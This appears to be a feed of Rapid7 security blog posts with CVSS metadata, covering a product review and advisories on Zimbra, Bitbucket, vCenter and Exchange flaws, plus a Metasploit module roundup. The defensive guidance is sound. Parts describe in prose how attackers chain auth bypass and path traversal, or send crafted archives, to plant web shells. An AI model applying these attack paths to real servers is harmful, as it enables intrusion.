
Another quarter comes to a close! While we definitely had our share of summer fun, our team continued to invest in the product, releasing features and updates like recurring coverage for enterprise technologies, performance enhancements, and more. Let’s take a look at some of the key releases in [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) from Q3.
## [[InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>) and [Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>)] Recurring coverage for VMware vCenter
Recurring coverage provides ongoing, automatic vulnerability coverage for popular enterprise technology and systems. We recently added VMware vCenter to our list.
VMware vCenter Server is a centralized management platform used to manage virtual machines, ESXi hosts, and dependent components from a single host. Last year, vCenter was a significant target for bad actors and became the subject of a [number](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>) [of](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>) zero-days. Rapid7 provided ad hoc coverage to protect you against the vulnerabilities. Now, recurring coverage ensures fast, comprehensive protection that provides offensive and defensive security against vCenter vulnerabilities as they arise.
## [InsightVM and Nexpose] Tune Assistant
The Security Console in InsightVM and Nexpose contains components that benefit from performance tuning. Tune Assistant is a built-in feature that will calculate performance tuning values based on resources allocated to the Security Console server, then automatically apply those values.
Tuning is calculated and applied to all new consoles when the product first starts up, and customers experiencing performance issues on existing consoles can now easily increase their own resources. For more information, read our [docs page](<https://docs.rapid7.com/insightvm/configuring-maximum-performance-in-an-enterprise-environment/>) on configuring maximum performance in an enterprise environment.

## [InsightVM and Nexpose] Windows Server 2022 Support
We want to ensure InsightVM and Nexpose are supported on business-critical technologies and operating systems. We added Windows Server 2022, the latest operating system for servers from Microsoft, to our list. The Scan Engine and Security Console can be installed and will be supported by Rapid7 on Windows Server 2022. [Learn more](<https://www.rapid7.com/products/insightvm/system-requirements/>) about the systems we support.
## [InsightVM and Nexpose] Checks for notable vulnerabilities
With exploitation of major vulnerabilities in [Mitel MiVoice Connect](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>), multiple [Confluence](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) [applications](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>), and [other](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) [popular](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>) [solutions](<https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/>), the threat actors definitely did not take it easy this summer. InsightVM and Nexpose customers can assess their exposure to many of these CVEs with vulnerability checks, including:
* **Mitel MiVoice Connect Service Appliance | CVE-2022-29499:** MiVoice Connect, an onsite VoIP business phone system, had a vulnerability that arose from insufficient data validation in a diagnostic script. The vulnerability potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>).
* **“Questions” add-on for Confluence Application | CVE-2022-26138:** This vulnerability affected “Questions,” an add-on for the Confluence application. It was quickly exploited in the wild once the hardcoded password was released on social media. [Learn more about the vulnerability and our response](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>).
* **Multiple vulnerabilities in Zimbra Collaboration Suite:** Zimbra, a business productivity suite, was affected by five different vulnerabilities, one of which was unpatched, and four of which were being actively and widely exploited in the wild by well-organized threat actors. [Learn more about the vulnerabilities and our response](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>). The Zimbra checks cover:
  * **CVE-2022-30333**
  * **CVE-2022-27924**
  * **CVE-2022-27925**
  * **CVE-2022-37042**
  * **CVE-2022-37393**
We were hard at work this summer making improvements and increasing the level of protections against attackers for our customers. As we head into the fall and the fourth quarter of the year, you can bet we will continue to make InsightVM the best and most comprehensive risk management platform available. Stay tuned for more great things, and have a happy autumn.
_**Additional reading:**_
* _[The 2022 SANS Top New Attacks and Threats Report Is In, and It's Required Reading](<https://www.rapid7.com/blog/post/2022/09/14/the-2022-sans-top-new-attacks-and-threats-report-is-in-and-its-required-reading/>)_
* _[InsightVM: Best Practices to Improve Your Console](<https://www.rapid7.com/blog/post/2022/09/12/insightvm-best-practices-to-improve-your-console/>)_
* _[5 Steps for Dealing With Unknown Environments in InsightVM](<https://www.rapid7.com/blog/post/2022/09/06/5-steps-for-dealing-with-unknown-environments-in-insightvm/>)_
* _[What’s New in InsightVM and Nexpose: Q2 2022 in Review](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)_
Volexity\u2019s [blog](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) also has information on how to look for webshells dropped on Zimbra instances, such as comparing the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. They have published [lists of valid JSP files included in Zimbra installations](<https://github.com/volexity/threat-intel/tree/main/2022/2022-08-10%20Mass%20exploitation%20of%20\\(Un\\)authenticated%20Zimbra%20RCE%20CVE-2022-27925>) for the latest version of 8.8.15 and of 9.0.0 (at time of writing).\n\nFinally, we recommend blocking internet traffic to Zimbra servers wherever possible and [configuring Zimbra to block external Memcached](<https://wiki.zimbra.com/wiki/Blocking_Memcached_Attack>), even on patched versions of Zimbra.\n\n## Rapid7 customers\n\nVulnerability checks for all five Zimbra CVEs are available via a content-only update as of August 18, 3pm ET.\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR\u2019s built-in detection rules from systems monitored by the Insight Agent. 
Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Suspicious Process - Zimbra Collaboration Suite Webserver Spawns Script Interpreter\n * Suspicious Process - \u201cZimbra\u201d User Runs Shell or Script Interpreter\n\nThe Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n_**Additional reading:**_\n\n * _[Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>)_\n * _[Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>)_\n * _[CVE-2022-27511: Citrix ADM Remote Device Takeover](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>)_\n * _[Active Exploitation of Confluence CVE-2022-26134](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T12:55:18", "type": "rapid7blog", "title": "Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-08-17T12:55:18", "id": "RAPID7BLOG:B294A0F514563C5FBF86F841910C60BE", "href": "https://blog.rapid7.com/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-26T16:04:26", "description": "\n\nOn August 24, 2022, Atlassian published [an advisory for Bitbucket Server and Data Center](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html>) alerting users to [CVE-2022-36804](<https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis/?utm_source=rapid7-blog&utm_medium=referral&utm_campaign=etr-atlassian-bitbucket>). The advisory reveals a command injection vulnerability in multiple API endpoints, which allows an attacker with access to a public repository or with **read permissions** to a private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. CVE-2022-36804 carries a CVSSv3 score of 9.8 and is easily exploitable. 
Rapid7\u2019s vulnerability research team has a [full technical analysis in AttackerKB](<https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis/?utm_source=rapid7-blog&utm_medium=referral&utm_campaign=etr-atlassian-bitbucket>), including how to use CVE-2022-36804 to create a simple reverse shell.\n\n[According to Shodan](<https://www.shodan.io/search?query=http.component%3A%22atlassian+bitbucket%22>), there are about 1,400 internet-facing servers, but it\u2019s not immediately obvious how many have a public repository. There are no public reports of exploitation in the wild as of September 20, 2022 (edit: see note below), but there has been strong interest in the vulnerability from researchers and exploit brokers, and there are now multiple public exploits available. Because the vulnerability is trivially exploitable and the patch is relatively simple to reverse- engineer, it\u2019s likely that targeted exploitation has already occurred in the wild. We expect to see larger-scale exploitation of CVE-2022-36804 soon.\n\n**Note:** Several threat intelligence sources [reported](<https://twitter.com/Shadowserver/status/1573300004072132608>) seeing exploitation attempts in the wild as of September 23, 2022.\n\n**Affected products:** \nBitbucket Server and Data Center 7.6 prior to 7.6.17 \nBitbucket Server and Data Center 7.17 prior to 7.17.10 \nBitbucket Server and Data Center 7.21 prior to 7.21.4 \nBitbucket Server and Data Center 8.0 prior to 8.0.3 \nBitbucket Server and Data Center 8.1 prior to 8.1.3 \nBitbucket Server and Data Center 8.2 prior to 8.2.2 \nBitbucket Server and Data Center 8.3 prior to 8.3.1\n\n## Mitigation guidance\n\nOrganizations that use Bitbucket Server and Data Center in their environments should patch as quickly as possible [using Atlassian's guide](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-upgrade-guide-776640551.html>), without waiting for a regular patch cycle to occur. 
Blocking network access to Bitbucket may also function as a temporary stop-gap solution, but this should not be a substitute for patching.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-36804 with an unauthenticated vulnerability check in the September 20, 2022 content release (`ContentOnly-content-1.1.2653-202209202050`).\n\nA detection rule, `Suspicious Process - Atlassian BitBucket Spawns Suspicious Commands`, was deployed to InsightIDR around 10am ET on September 22, 2022.\n\n## Updates\n\n**September 22, 2022 10:00AM ET** \nUpdated Rapid7 customers section to include information on a new IDR detection rule.\n\n**September 26, 2022 10:30 AM EDT** \nUpdated to reflect reports of exploitation in the wild.\n\n_**Additional reading:**_\n\n * _[Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>)_\n * _[Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>)_\n * _[Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>)_\n * _[CVE-2022-27511: Citrix ADM Remote Device Takeover](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-20T15:14:26", "type": "rapid7blog", "title": "CVE-2022-36804: Easily Exploitable Vulnerability in Atlassian Bitbucket Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138", "CVE-2022-27511", "CVE-2022-29499", "CVE-2022-36804"], "modified": "2022-09-20T15:14:26", "id": "RAPID7BLOG:BCF3916E38EC7840E9BABBDD5431352B", "href": "https://blog.rapid7.com/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-26T22:02:56", "description": "## Zimbra Auth Bypass to Shell\n\n\n\n[Ron Bowes](<https://github.com/rbowes-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/16922>) that targets multiple versions of Zimbra Collaboration Suite. The module leverages an authentication bypass (CVE-2022-37042) and a directory traversal vulnerability (CVE-2022-27925) to gain code execution as the `zimbra` user. The auth bypass functionality correctly checks for a valid session; however, the function that performs the check does not return and instead proceeds with execution. Because of this, an attacker only needs a valid account to get a shell. 
The directory traversal vulnerability lives in Zimbra\u2019s Zip file extraction functionality, enabling an attacker to write an arbitrary file to a web directory. Coupling those two vulnerabilities together, the module writes a JSP shell to the target via a POST request to the `/mboximport` endpoint. These vulnerabilities have been [reported](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) as exploited in the wild.\n\n## Another Deserialization Flaw in Exchange\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) submitted a new [module](<https://github.com/rapid7/metasploit-framework/pull/16915>) that exploits an authenticated .Net deserialization vulnerability in Microsoft Exchange. The vulnerability is due to a flaw in the `ChainedSerializationBinder`, a type validator for serialized data. Provided the attacker has credentials for at least a low-privileged user, this exploit will result in code execution as `NT AUTHORITY\\SYSTEM`.\n\n## New module content (2)\n\n * [Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)](<https://github.com/rapid7/metasploit-framework/pull/16922>) by Ron Bowes, Volexity Threat Research, and Yang_99's Nest, which exploits [CVE-2022-37042](<https://attackerkb.com/topics/BLL1VR8x6z/cve-2022-37042?referrer=blog>) \\- adds a module for CVE-2022-27925 and CVE-2022-37042. 
An attacker can exploit these issues to bypass authentication and then exploit a ZIP file path directory traversal vulnerability to gain RCE as the `zimbra` user.\n * [#16915](<https://github.com/rapid7/metasploit-framework/pull/16915>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A new module has been added for CVE-2022-23277 which is another ChainedSerializationBinder bypass that results in RCE on vulnerable versions of Exchange prior to the March 8th 2022 security updates.\n\n## Enhancements and features (6)\n\n * [#16701](<https://github.com/rapid7/metasploit-framework/pull/16701>) from [jbaines-r7](<https://github.com/jbaines-r7>) \\- This improves the original `auxiliary/scanner/http/cisco_asa_asdm` scanner module by adding the ability to brute force the Cisco ASA's Clientless SSL VPN (webvpn) interface. The old module has been replaced by two new modules, this one and `auxiliary/scanner/http/cisco_asa_asdm_bruteforce`, which provide brute force of the Cisco ASA's ASDM interface directly.\n * [#16898](<https://github.com/rapid7/metasploit-framework/pull/16898>) from [bcoles](<https://github.com/bcoles>) \\- This adds a `Msf::Post::Windows::Accounts.domain_controller?` method and removes `is_dc?` methods from several modules in favor of using the new method.\n * [#16899](<https://github.com/rapid7/metasploit-framework/pull/16899>) from [bcoles](<https://github.com/bcoles>) \\- This removes the `domain_list_gen` Meterpreter script which has been replaced by the `post/windows/gather/enum_domain_group_users` post module.\n * [#16907](<https://github.com/rapid7/metasploit-framework/pull/16907>) from [bcoles](<https://github.com/bcoles>) \\- This improves the MS10-092 LPE exploit module. It uses the new task manager mixin, adds additional module metadata, and documentation.\n * [#16912](<https://github.com/rapid7/metasploit-framework/pull/16912>) from [bcoles](<https://github.com/bcoles>) \\- This removes the sound recorder Meterpreter script. 
It has been replaced by the record_mic post module.\n * [#16938](<https://github.com/rapid7/metasploit-framework/pull/16938>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `ldap_query` module has been updated to allow the stored query templates to specify a Base DN prefix. Additionally, two ADCS-related queries that then use this to enumerate certificate authorities and certificate templates.\n\n## Bugs fixed (4)\n\n * [#16925](<https://github.com/rapid7/metasploit-framework/pull/16925>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- This fixes some issues with the payload generation in the UnRAR generic exploit module (CVE-2022-30333). This also adds the option to provide its own custom payload.\n * [#16931](<https://github.com/rapid7/metasploit-framework/pull/16931>) from [bcoles](<https://github.com/bcoles>) \\- A bug has been fixed in `Rex::Post::Meterpreter::Extensions::Stdapi::AudioOutput.play_file` where a channel would be opened before the path parameter was verified. 
This could lead to dangling channels being opened which would not be closed until Meterpreter was shut down.\n * [#16935](<https://github.com/rapid7/metasploit-framework/pull/16935>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes multiple SSH warnings when loading msfconsole on Ubuntu 22.04 or the latest Kali version.\n * [#16936](<https://github.com/rapid7/metasploit-framework/pull/16936>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when using evasion modules when `mingw` is not present on the host machine for generating encrypted payloads.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.13...6.2.14](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-18T10%3A41%3A42-05%3A00..2022-08-25T17%3A06%3A18%2B01%3A00%22>)\n * [Full diff 6.2.13...6.2.14](<https://github.com/rapid7/metasploit-framework/compare/6.2.13...6.2.14>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-26T21:47:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23277", "CVE-2022-27925", "CVE-2022-30333", "CVE-2022-37042"], "modified": "2022-08-26T21:47:13", "id": "RAPID7BLOG:559E0E8D2A3CCC9876788213E94E36A4", "href": "https://blog.rapid7.com/2022/08/26/metasploit-wrap-up-173/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-10-04T19:05:10", "description": "\n\n_See the Updates section at the end of this post for new information as it comes to light, including reports of exploitation._\n\n## Description\n\nOn Tuesday, September 21, 2021, VMware published [security advisory 
VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>), which includes details on CVE-2021-22005, a critical file upload vulnerability (CVSSv3 9.8) in vCenter Server that allows remote code execution (RCE) on the appliance. Successful exploitation of this vulnerability is achieved simply by uploading a specially crafted file via port 443 \u201cregardless of the configuration settings of vCenter Server.\u201d\n\nVMware has published an [FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq#section1>) outlining the details of this vulnerability and makes it clear that this should be patched \u201cimmediately.\u201d A workaround is also being provided by VMware \u2014 however, its use is not being recommended and should only be used as a temporary solution.\n\nYou can find Rapid7's vulnerability analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>) which contains a root cause analysis and full RCE information.\n\n## Affected products\n\n * vCenter Server versions 6.7 and 7.0\n * Cloud Foundation (vCenter Server) 3.x, 4.x\n\n## Guidance\n\nWe echo VMware\u2019s advice that impacted servers should be patched right away. While there are currently no reports of exploitation, we expect this to quickly change within days \u2014 just as previous critical vCenter vulnerabilities did ([CVE-2021-21985](<https://www.rapid7.com/blog/post/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/>), [CVE-2021-21972](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>)). 
Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet.\n\nWe will update this post as more information becomes available, such as information on exploitation.\n\n## Rapid7 customers\n\nA vulnerability check for CVE-2021-22005 is under development and will be available to InsightVM and Nexpose customers in an upcoming content release pending the QA process.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find assets that have vCenter Server installed by creating the following query: `software.description` `contains` `vCenter Server`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `Software name` `contains` `vCenter Server`.\n\n## Updates\n\n**[September 22, 2021]** \nAn InsightVM and Nexpose vulnerability check for CVE-2021-22005 is scheduled to be released on the afternoon (EST) of September 22, 2021.\n\nRapid7 Labs estimates there are over 2,700 vulnerable vCenter servers exposed to the public internet. This represents only a fraction of vulnerable servers, however, as attackers with existing network ingress will be tempted to utilize that access to take advantage of this vulnerability. 
\n\n**[September 23, 2021]** \nCVE-2021-22005 authenticated checks for InsightVM and Nexpose are available in content update 3594982882, released on September 23, 2021.\n\n**[September 24, 2021]** \nCVE-2021-22005 is now being [exploited](<https://twitter.com/bad_packets/status/1441465508348317702>) in the wild.\n\n**[September 29, 2021]** \nUpdated description to include a link to the Rapid7 analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T19:55:35", "type": "rapid7blog", "title": "Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005"], "modified": "2021-09-21T19:55:35", "id": "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "href": "https://blog.rapid7.com/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-11T22:01:25", "description": "\n\n_Note: Zimbra release [9.0.0 P27](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27>) addressed this vulnerability on October 10, 2022._\n\n[CVE-2022-41352](<https://nvd.nist.gov/vuln/detail/CVE-2022-41352>) is an unpatched remote code execution vulnerability in Zimbra Collaboration Suite discovered in the wild due to [active exploitation](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>). The vulnerability is due to the method (`cpio`) in which Zimbra\u2019s antivirus engine (Amavis) scans inbound emails. Zimbra has provided a [workaround](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>), which is to install the `pax` utility and restart the Zimbra services. Note that `pax` is installed by default on Ubuntu, so Ubuntu-based Zimbra installations are not vulnerable by default.\n\n> **Note:** This vulnerability, CVE-2022-41352 is effectively identical to [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333>) but leverages a different file format (`.cpio` and `.tar` as opposed to `.rar`). It is also a byproduct of a much older (unfixed) vulnerability, [CVE-2015-1197](<https://nvd.nist.gov/vuln/detail/CVE-2015-1197>). 
While the original CVE-2015-1197 affects most major Linux distros, our research team found that it is **not exploitable** unless a secondary application \u2013 such as Zimbra, in this case \u2013 uses `cpio` to extract untrusted archives; therefore, this blog is only focusing on Zimbra CVE-2022-41352.\n\nRapid7 has published technical documentation, including proof-of-concept (PoC) and indicator-of-compromise (IoC) information, regarding CVE-2022-41352 on [AttackerKB](<https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis?utm_source=blog&utm_medium=referral&utm_campaign=etr_cve_2022_41352>).\n\n## Background\n\nTo exploit this vulnerability, an attacker would email a `.cpio`, `.tar`, or `.rpm` to an affected server. When Amavis inspects it for malware, it uses `cpio` to extract the file. Since `cpio` has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access. The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist.\n\nAs of October 6, 2022, CVE-2022-41352 is not patched, but Zimbra has acknowledged the risk of relying on `cpio` in a [blog post](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>) where they recommend mitigations. CVE-2022-41352 was discovered in the wild due to [active exploitation](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>). Recently, CISA and others [have warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>) of multiple threat actors leveraging other vulnerabilities in Zimbra, which makes it likely that threat actors would logically move to exploit this latest unpatched vulnerability, too. 
In August, Rapid7 reported on the [active exploitation of multiple vulnerabilities in Zimbra Collaboration Suite](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>).\n\n## Affected products\n\n**Please note that information on affected versions or requirements for exploitability may change as we learn more about the threat.**\n\nTo be exploitable, two conditions must exist:\n\n 1. A vulnerable version of `cpio` must be installed, which is the case on basically every system (see [CVE-2015-1197](<https://nvd.nist.gov/vuln/detail/CVE-2015-1197>))\n 2. The `pax` utility must **not** be installed, as Amavis prefers `pax` and `pax` is not vulnerable\n\nUnfortunately, `pax` is not installed by default on Red Hat-based distros, and therefore they are vulnerable by default. We tested all (current) Linux distros that Zimbra officially supports in their default configurations and determined the following:\n\nLinux Distro | Vulnerable? \n---|--- \nOracle Linux 8 | Vulnerable \nRed Hat Enterprise Linux 8 | Vulnerable \nRocky Linux 8 | Vulnerable \nCentOS 8 | Vulnerable \nUbuntu 20.04 | Not vulnerable (pax is installed by default) \nUbuntu 18.04 | Not vulnerable (pax is installed, cpio has Ubuntu's custom patch) \n \nZimbra says that their plan is to remove the dependency on `cpio` entirely by making `pax` a prerequisite for Zimbra Collaboration Suite. Moving to `pax` is the best option since `cpio` cannot be used securely (because most major operating systems [removed a security patch](<https://lists.gnu.org/archive/html/bug-cpio/2019-11/msg00016.html>)).\n\n## Remediation\n\nZimbra released a patch for CVE-2022-41352 on October 10, 2022. The patched version is [Zimbra Collaboration Suite 9.0.0 P27](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27>). 
